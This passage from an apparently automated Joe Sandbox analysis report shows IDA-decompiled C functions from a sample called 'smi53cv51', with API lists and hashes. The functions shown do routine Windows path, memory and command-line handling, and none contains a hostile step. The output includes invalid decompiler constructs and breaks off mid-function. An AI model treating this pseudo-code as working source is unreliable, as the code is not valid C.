                                                                                                                                                                                                      				char* _t6;
                                                                                                                                                                                                      				char* _t8;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				char* _t16;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				char* _t19;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				_t1 = _t17 + 1; // 0xa68b3f
                                                                                                                                                                                                      				_t12 = _t1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t4 =  *_t17;
                                                                                                                                                                                                      					_t17 = _t17 + 1;
                                                                                                                                                                                                      				} while (_t4 != 0);
                                                                                                                                                                                                      				_t18 = _t17 - _t12;
                                                                                                                                                                                                      				_t2 = _t18 + 1; // 0xa68b40
                                                                                                                                                                                                      				if(_t2 < __edx) {
                                                                                                                                                                                                      					_t19 = _t18 + __ecx;
                                                                                                                                                                                                      					if(_t19 > __ecx) {
                                                                                                                                                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                      						if( *_t8 != 0x5c) {
                                                                                                                                                                                                      							 *_t19 = 0x5c;
                                                                                                                                                                                                      							_t19 =  &(_t19[1]);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t6 = _a4;
                                                                                                                                                                                                      					 *_t19 = 0;
                                                                                                                                                                                                      					while( *_t6 == 0x20) {
                                                                                                                                                                                                      						_t6 = _t6 + 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return E00A616B3(_t16, _t10, _t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0x8007007a;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(00A68B3E,00A68B3F,00000001,00A68B3E,-00000003,?,00A660EC,00A61140,?), ref: 00A665BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                                                      • Opcode ID: e39cdb3925c8ef446ed25e435e41b91b8a0b964e9b8f654f1b13125cfa1019f3
                                                                                                                                                                                                      • Instruction ID: c9b47d1409b490e6859aaf97d808d88614ca6f50768d43ec351d0d8e684f1133
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e39cdb3925c8ef446ed25e435e41b91b8a0b964e9b8f654f1b13125cfa1019f3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F04C721042509BD3314A1DD884B66BFFE9B86350F28026EE8DBC3205CA658C4683A4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A6621E() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					0x4f0 = 2;
                                                                                                                                                                                                      					_t9 = E00A6597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E00A644B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					 *0xa69124 = E00A66285();
                                                                                                                                                                                                      					_t9 = 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A6623F
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                        • Part of subcall function 00A66285: GetLastError.KERNEL32(00A65BBC), ref: 00A66285
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 381621628-0
                                                                                                                                                                                                      • Opcode ID: a89eb2e8f6508256513fc62150c36589b9e6cb779806aa762cc2f5c1962d7fc2
                                                                                                                                                                                                      • Instruction ID: aa022a32181e28ca3fcb70760e2ad94df0e2d2833cfd1046b861333ca08e7733
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a89eb2e8f6508256513fc62150c36589b9e6cb779806aa762cc2f5c1962d7fc2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98F0E9B0B00208BBD750EB748E06FFE37BCDB54300F400469B986D7181DDB49D458650
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A64B60(signed int _a4) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t15 = _a4 * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 0xa68d64)) != 1) {
                                                                                                                                                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0xa68d74)); // executed
                                                                                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                                                                                      						return _t9 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					 *((intOrPtr*)(_t15 + 0xa68d60)) = 1;
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xa68d60)) = 1;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xa68d68)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xa68d70)) = 0;
                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0xa68d6c)) = 0;
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00A64FA1,00000000), ref: 00A64B98
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2591292051-0
                                                                                                                                                                                                      • Opcode ID: 2eb88f1e3aab45b246792c378fb8caec57eceb1fb13772cfa56c4e0373bde1ea
                                                                                                                                                                                                      • Instruction ID: 7717e57501112d03684c0ff5c29d9aa131eefaa0dcdec1aafc2aefae1527d6b7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2eb88f1e3aab45b246792c378fb8caec57eceb1fb13772cfa56c4e0373bde1ea
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 09F01231540B08DE5B71CF39CC00652BBFDEAA53A07100B2ED46ED2190DB34A481CBA0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A666AE(CHAR* __ecx) {
                                                                                                                                                                                                      				unsigned int _t1;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                      				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                      					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,00A64777,?,00A64E38,?), ref: 00A666B1
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                      • Opcode ID: 557ef9e285cb37ead73c28aa78a0e48c499efb707a9bbc004691662073ee9dbf
                                                                                                                                                                                                      • Instruction ID: 954ddc27adb18becbf637338ec762f87f3a268141bab325baebcf956302da3d7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 557ef9e285cb37ead73c28aa78a0e48c499efb707a9bbc004691662073ee9dbf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1B092BA226440426A254771BC295562961A7D123A7E51B90F032D01E0CA7EC856D404
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A64CA0(long _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A64CAA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3761449716-0
                                                                                                                                                                                                      • Opcode ID: 60967759ea18ae30c9f733df647a69c5c981e20b5f0a5518a8cd7540fb5f38b3
                                                                                                                                                                                                      • Instruction ID: 174157bafd49528552631832f7b24c2417c8b56d90000b099e1a0fa4df8a0446
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60967759ea18ae30c9f733df647a69c5c981e20b5f0a5518a8cd7540fb5f38b3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DEB0123204820CB7CF001FC2EC09F853F2DE7C4761F150000F60C454508AB294118A96
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A64CC0(void* _a4) {
                                                                                                                                                                                                      				void* _t2;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                      				return _t2;
                                                                                                                                                                                                      			}





                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeGlobal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2979337801-0
                                                                                                                                                                                                      • Opcode ID: c8921c21467b18a9700da7273ea08c82e3e23a6e23710a94311e1de52c0f0756
                                                                                                                                                                                                      • Instruction ID: d2adcada1901603592da4c4fd9bd269ec8739c42c5bcf88561f3444de1d51b56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8921c21467b18a9700da7273ea08c82e3e23a6e23710a94311e1de52c0f0756
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44B0123100010CB78F001B82EC088453F2DD6C02607010010F50C414218B7398128985
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 92%
                                                                                                                                                                                                      			E00A65C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                                      				CHAR* _v265;
                                                                                                                                                                                                      				char _v266;
                                                                                                                                                                                                      				char _v267;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				CHAR* _v272;
                                                                                                                                                                                                      				char _v276;
                                                                                                                                                                                                      				signed int _v296;
                                                                                                                                                                                                      				char _v556;
                                                                                                                                                                                                      				signed int _t61;
                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				CHAR* _t69;
                                                                                                                                                                                                      				signed int _t71;
                                                                                                                                                                                                      				void* _t75;
                                                                                                                                                                                                      				char _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				intOrPtr _t88;
                                                                                                                                                                                                      				void* _t100;
                                                                                                                                                                                                      				intOrPtr _t101;
                                                                                                                                                                                                      				CHAR* _t104;
                                                                                                                                                                                                      				intOrPtr _t105;
                                                                                                                                                                                                      				void* _t111;
                                                                                                                                                                                                      				void* _t115;
                                                                                                                                                                                                      				CHAR* _t118;
                                                                                                                                                                                                      				void* _t119;
                                                                                                                                                                                                      				void* _t127;
                                                                                                                                                                                                      				CHAR* _t129;
                                                                                                                                                                                                      				void* _t132;
                                                                                                                                                                                                      				void* _t142;
                                                                                                                                                                                                      				signed int _t143;
                                                                                                                                                                                                      				CHAR* _t144;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				void* _t146;
                                                                                                                                                                                                      				void* _t147;
                                                                                                                                                                                                      				void* _t149;
                                                                                                                                                                                                      				char _t155;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				void* _t162;
                                                                                                                                                                                                      				void* _t163;
                                                                                                                                                                                                      				char _t167;
                                                                                                                                                                                                      				char _t170;
                                                                                                                                                                                                      				CHAR* _t173;
                                                                                                                                                                                                      				void* _t177;
                                                                                                                                                                                                      				intOrPtr* _t183;
                                                                                                                                                                                                      				intOrPtr* _t192;
                                                                                                                                                                                                      				CHAR* _t199;
                                                                                                                                                                                                      				void* _t200;
                                                                                                                                                                                                      				CHAR* _t201;
                                                                                                                                                                                                      				void* _t205;
                                                                                                                                                                                                      				void* _t206;
                                                                                                                                                                                                      				int _t209;
                                                                                                                                                                                                      				void* _t210;
                                                                                                                                                                                                      				void* _t212;
                                                                                                                                                                                                      				void* _t213;
                                                                                                                                                                                                      				CHAR* _t218;
                                                                                                                                                                                                      				intOrPtr* _t219;
                                                                                                                                                                                                      				intOrPtr* _t220;
                                                                                                                                                                                                      				signed int _t221;
                                                                                                                                                                                                      				signed int _t223;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t173 = __ecx;
                                                                                                                                                                                                      				_t61 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                      				_push(__ebx);
                                                                                                                                                                                                      				_push(__esi);
                                                                                                                                                                                                      				_push(__edi);
                                                                                                                                                                                                      				_t209 = 1;
                                                                                                                                                                                                      				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                      					_t63 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					while(_t209 != 0) {
                                                                                                                                                                                                      						_t67 =  *_t173;
                                                                                                                                                                                                      						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                      							_t173 = CharNextA(_t173);
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_v272 = _t173;
                                                                                                                                                                                                      						if(_t67 == 0) {
                                                                                                                                                                                                      							break;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t69 = _v272;
                                                                                                                                                                                                      							_t177 = 0;
                                                                                                                                                                                                      							_t213 = 0;
                                                                                                                                                                                                      							_t163 = 0;
                                                                                                                                                                                                      							_t202 = 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								if(_t213 != 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L21;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t69 =  *_t69;
                                                                                                                                                                                                      									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                      										break;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t69 = _v272;
                                                                                                                                                                                                      										L21:
                                                                                                                                                                                                      										_t155 =  *_t69;
                                                                                                                                                                                                      										if(_t155 != 0x22) {
                                                                                                                                                                                                      											if(_t202 >= 0x104) {
                                                                                                                                                                                                      												goto L106;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                      												_t177 = _t177 + 1;
                                                                                                                                                                                                      												_t202 = _t202 + 1;
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											if(_v272[1] == 0x22) {
                                                                                                                                                                                                      												if(_t202 >= 0x104) {
                                                                                                                                                                                                      													L106:
                                                                                                                                                                                                      													_t63 = 0;
                                                                                                                                                                                                      													L125:
                                                                                                                                                                                                      													_pop(_t210);
                                                                                                                                                                                                      													_pop(_t212);
                                                                                                                                                                                                      													_pop(_t162);
                                                                                                                                                                                                      													return E00A66CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                      													_t177 = _t177 + 1;
                                                                                                                                                                                                      													_t202 = _t202 + 1;
                                                                                                                                                                                                      													_t157 = 2;
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t157 = 1;
                                                                                                                                                                                                      												if(_t213 != 0) {
                                                                                                                                                                                                      													_t163 = 1;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t213 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L30;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L131;
                                                                                                                                                                                                      								L30:
                                                                                                                                                                                                      								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                      								_t69 = _v272;
                                                                                                                                                                                                      							} while ( *_t69 != 0);
                                                                                                                                                                                                      							if(_t177 >= 0x104) {
                                                                                                                                                                                                      								E00A66E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                      								asm("int3");
                                                                                                                                                                                                      								_push(_t221);
                                                                                                                                                                                                      								_t222 = _t223;
                                                                                                                                                                                                      								_t71 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                      								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                      									0x4f0 = 2;
                                                                                                                                                                                                      									_t75 = E00A6597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E00A644B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                      									 *0xa69124 = E00A66285();
                                                                                                                                                                                                      									_t75 = 0;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								return E00A66CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                      								if(_t213 == 0) {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										goto L34;
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										goto L40;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(_t163 != 0) {
                                                                                                                                                                                                      										L40:
                                                                                                                                                                                                      										_t79 = _v268;
                                                                                                                                                                                                      										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                      											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                      											if(_t83 == 0) {
                                                                                                                                                                                                      												_t202 = 0x521;
                                                                                                                                                                                                      												E00A644B9(0, 0x521, 0xa61140, 0, 0x40, 0);
                                                                                                                                                                                                      												_t85 =  *0xa68588; // 0x0
                                                                                                                                                                                                      												if(_t85 != 0) {
                                                                                                                                                                                                      													CloseHandle(_t85);
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												ExitProcess(0);
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t87 = _t83 - 4;
                                                                                                                                                                                                      											if(_t87 == 0) {
                                                                                                                                                                                                      												if(_v266 != 0) {
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                      														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t50;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t88 =  *_t183;
                                                                                                                                                                                                      															_t183 = _t183 + 1;
                                                                                                                                                                                                      														} while (_t88 != 0);
                                                                                                                                                                                                      														if(_t183 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t205 = 0x5b;
                                                                                                                                                                                                      															if(E00A6667F(_t215, _t205) == 0) {
                                                                                                                                                                                                      																L115:
                                                                                                                                                                                                      																_t206 = 0x5d;
                                                                                                                                                                                                      																if(E00A6667F(_t215, _t206) == 0) {
                                                                                                                                                                                                      																	L117:
                                                                                                                                                                                                      																	_t202 =  &_v276;
                                                                                                                                                                                                      																	_v276 = _t167;
                                                                                                                                                                                                      																	if(E00A65C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		_t202 = 0x104;
                                                                                                                                                                                                      																		E00A61680(0xa68c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	_t202 = 0x5b;
                                                                                                                                                                                                      																	if(E00A6667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																		goto L49;
                                                                                                                                                                                                      																	} else {
                                                                                                                                                                                                      																		goto L117;
                                                                                                                                                                                                      																	}
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t202 = 0x5d;
                                                                                                                                                                                                      																if(E00A6667F(_t215, _t202) == 0) {
                                                                                                                                                                                                      																	goto L49;
                                                                                                                                                                                                      																} else {
                                                                                                                                                                                                      																	goto L115;
                                                                                                                                                                                                      																}
                                                                                                                                                                                                      															}
                                                                                                                                                                                                      														}
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													 *0xa68a24 = 1;
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      												goto L50;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												_t100 = _t87 - 1;
                                                                                                                                                                                                      												if(_t100 == 0) {
                                                                                                                                                                                                      													L98:
                                                                                                                                                                                                      													if(_v266 != 0x3a) {
                                                                                                                                                                                                      														goto L49;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                      														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                      														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                      														_t202 = _t38;
                                                                                                                                                                                                      														do {
                                                                                                                                                                                                      															_t101 =  *_t192;
                                                                                                                                                                                                      															_t192 = _t192 + 1;
                                                                                                                                                                                                      														} while (_t101 != 0);
                                                                                                                                                                                                      														if(_t192 == _t202) {
                                                                                                                                                                                                      															goto L49;
                                                                                                                                                                                                      														} else {
                                                                                                                                                                                                      															_t202 =  &_v276;
                                                                                                                                                                                                      															_v276 = _t170;
                                                                                                                                                                                                      															if(E00A65C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                      																goto L49;
                                                                                                                                                                                                      															} else {
                                                                                                                                                                                                      																_t104 = CharUpperA(_v267);
